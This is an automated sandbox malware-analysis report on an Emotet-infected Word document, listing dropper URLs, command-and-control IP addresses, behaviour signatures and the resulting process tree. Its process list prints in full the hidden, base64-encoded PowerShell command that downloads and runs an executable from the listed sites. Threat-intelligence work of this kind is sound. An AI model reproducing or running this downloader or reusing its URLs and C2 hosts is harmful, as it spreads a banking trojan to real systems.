Overview

overview

10

task1

 

10

task2

 

10

Analysis

  • max time kernel
    109s
  • resource
    win7v191014
  • submitted
    09-12-2019 16:57

Sharing

Copy URL
Twitter E-mail

General

  • Target

    Docs_b147ef181809997d173ebc4242d4a74d.28.doc

  • Sample

    191209-634tpcdtna

  • SHA256

    23419c0a7cc778b60899d25977c95f7291915539f5f9bb85c5ce3bfe11c77e9b

Score
10/10
trojanbankeremotet

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://www.aitb66.com/wp-admin/wdm12182/
exe.dropper

http://zisoft.zinad.net/wp-content/7flgzi080/
exe.dropper

http://ausflugemarrakesh.com/cgi-bin/512/
exe.dropper

http://axis-gps.com/pzdjz/hgpu56/
exe.dropper

https://xploremotions.com/rtrx/c656/

Extracted

Family

emotet

C2

76.221.133.146:80

104.33.129.244:80

172.90.70.168:8080

96.126.121.64:443

104.236.137.72:8080

172.104.233.225:8080

85.234.143.94:8080

50.28.51.143:8080

190.186.164.23:80

47.146.42.234:80

63.246.252.234:80

80.29.54.20:80

68.183.190.199:8080

46.28.111.142:7080

183.82.97.25:80

87.106.46.107:8080

188.216.24.204:80

186.68.48.204:443

181.198.203.45:443

88.250.223.190:8080
rsa_pubkey.plain

Signatures

  • Executes dropped EXE 4 IoCs
  • Drops file in System32 directory 6 IoCs
  • Modifies registry class 136 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: EmotetMutantsSpam 2 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

    trojanbankeremotet
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_b147ef181809997d173ebc4242d4a74d.28.doc"
    1⤵
    • Drops file in System32 directory
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    PID:1992
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABSAGIAcgBtAHcAbABxAHkAaAByAD0AJwBSAHEAZAB6AHEAcgBtAHQAcwB4ACcAOwAkAE8AZABrAHUAZwBtAHIAagBnAGIAIAA9ACAAJwAzADcANwAnADsAJABOAHgAbABrAGMAZQBiAGYAYgBhAHoAPQAnAEQAbAByAGgAYwB3AHQAYQBjAHAAJwA7ACQARAB1AGsAcgBhAHkAeQBhAHgAaAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATwBkAGsAdQBnAG0AcgBqAGcAYgArACcALgBlAHgAZQAnADsAJABUAHAAcAB2AHEAdQByAHAAegBqAG8AZQA9ACcATgBpAGYAcABwAGQAcgBlAG8AJwA7ACQAUQBwAHkAeQBsAHEAaAB6AHoAdgBrAD0AJgAoACcAbgBlAHcALQBvAGIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIABOAEUAVAAuAFcARQBCAGMAbABpAGUATgB0ADsAJABPAHoAdQBkAG4AZQBjAGkAZQB5AG8APQAnAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBhAGkAdABiADYANgAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AdwBkAG0AMQAyADEAOAAyAC8AKgBoAHQAdABwADoALwAvAHoAaQBzAG8AZgB0AC4AegBpAG4AYQBkAC4AbgBlAHQALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ANwBmAGwAZwB6AGkAMAA4ADAALwAqAGgAdAB0AHAAOgAvAC8AYQB1AHMAZgBsAHUAZwBlAG0AYQByAHIAYQBrAGUAcwBoAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8ANQAxADIALwAqAGgAdAB0AHAAOgAvAC8AYQB4AGkAcwAtAGcAcABzAC4AYwBvAG0ALwBwAHoAZABqAHoALwBoAGcAcAB1ADUANgAvACoAaAB0AHQAcABzADoALwAvAHgAcABsAG8AcgBlAG0AbwB0AGkAbwBuAHMALgBjAG8AbQAvAHIAdAByAHgALwBjADYANQA2AC8AJwAuACIAUwBgAHAATABpAHQAIgAoACcAKgAnACkAOwAkAEsAdQBuAGkAbgBrAGgAYwA9ACcAUABtAGsAbABmAGgAcwBtAHQAdwAnADsAZgBvAHIAZQBhAGMAaAAoACQAQgB5AGgAeQBlAHgAaABkAHgAYgAgAGkAbgAgACQATwB6AHUAZABuAGUAYwBpAGUAeQBvACkAewB0AHIAeQB7ACQAUQBwAHkAeQBsAHEAaAB6AHoAdgBrAC4AIgBkAE8AdwBuAEwAYABPAGAAQQBkAEYAaQBMAGUAIgAoACQAQgB5AGgAeQBlAHgAaABkAHgAYgAsACAAJABEAHUAawByAGEAeQB5AGEAeABoACkAOwAkAFgAagBsAHYAbQBhAGYAYQBwAGIAcABzAD0AJwBFAGcAbQB6AGgAYwB3AHcAeAB2AHUAZQBqACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQAnACsAJwBJAHQAJwArACcAZQBtACcAKQAgACQARAB1AGsAcgBhAHkAeQBhAHgAaAApAC4AIgBsAGUATgBgAGcAdABoACIAIAAtAGcAZQAgADMANgA5ADEAMAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAGAAVABBAFIAVAAiACgAJABEAHUAawByAGEAeQB5AGEAeABoACkAOwAkAFUAZABwAHIAeABkAHgAcwB4AGgAdwBzAD0AJwBYAHIAZgBnAGQAbABhAHUAcABrAHgAJwA7AGIAcgBlAGEAawA7ACQAUABhAGkAcQBqAGEAeABnAGwAYwA9ACcAQQBqAHUAYgBhAGYAZABjACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEQAegBkAHMAbwByAHoAbwBmAHQAdwBzAGkAPQAnAFEAbgByAHcAaABsAG8AcQBkAGMAYgAnAA==
    1⤵
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2040
    • C:\Users\Admin\377.exe
      "C:\Users\Admin\377.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1112
      • C:\Users\Admin\377.exe
        --11945cd1
        3⤵
        • Executes dropped EXE
        • Drops file in System32 directory
        • Suspicious behavior: EmotetMutantsSpam
        • Suspicious use of SetWindowsHookEx
        PID:316
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "1003057684324364423430350252008227691971696020-12325563152092719173-1366370866"
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:2008
  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k WerSvcGroup
    1⤵
      PID:2028
    • C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
      "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
      1⤵
        PID:1912
      • C:\Windows\SysWOW64\sitkascan.exe
        "C:\Windows\SysWOW64\sitkascan.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1148
        • C:\Windows\SysWOW64\sitkascan.exe
          --30bfeaa7
          2⤵
          • Executes dropped EXE
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: EmotetMutantsSpam
          • Suspicious use of SetWindowsHookEx
          PID:528

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Initial Access

      Execution

      Persistence

      Privilege Escalation

      Defense Evasion

      Credential Access

      Discovery

      Query Registry

      1
      T1012

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\377.exe
        Download Submit
      • C:\Users\Admin\377.exe
        Download Submit
      • C:\Users\Admin\377.exe
        Download Submit
      • C:\Windows\SysWOW64\sitkascan.exe
        Download Submit
      • C:\Windows\SysWOW64\sitkascan.exe
        Download Submit
      • memory/316-12-0x0000000000400000-0x00000000004A2000-memory.dmp
        Filesize

        648KB

        Download
      • memory/316-11-0x00000000002F0000-0x0000000000307000-memory.dmp
        Filesize

        92KB

        Download
      • memory/528-17-0x0000000000400000-0x00000000004A2000-memory.dmp
        Filesize

        648KB

        Download
      • memory/1112-9-0x0000000000380000-0x0000000000397000-memory.dmp
        Filesize

        92KB

        Download
      • memory/1148-14-0x0000000000640000-0x0000000000657000-memory.dmp
        Filesize

        92KB

        Download
      • memory/1992-6-0x000000000651F000-0x0000000006523000-memory.dmp
        Filesize

        16KB

        Download
      • memory/1992-5-0x000000000651F000-0x0000000006523000-memory.dmp
        Filesize

        16KB

        Download
      • memory/1992-4-0x00000000064F9000-0x000000000651F000-memory.dmp
        Filesize

        152KB

        Download
      • memory/1992-3-0x0000000008ED0000-0x0000000008ED4000-memory.dmp
        Filesize

        16KB

        Download
      • memory/1992-0-0x0000000006400000-0x0000000006404000-memory.dmp
        Filesize

        16KB

        Download
      • memory/1992-2-0x000000000651F000-0x0000000006523000-memory.dmp
        Filesize

        16KB

        Download
      • memory/1992-1-0x00000000065A0000-0x00000000065A3000-memory.dmp
        Filesize

        12KB

        Download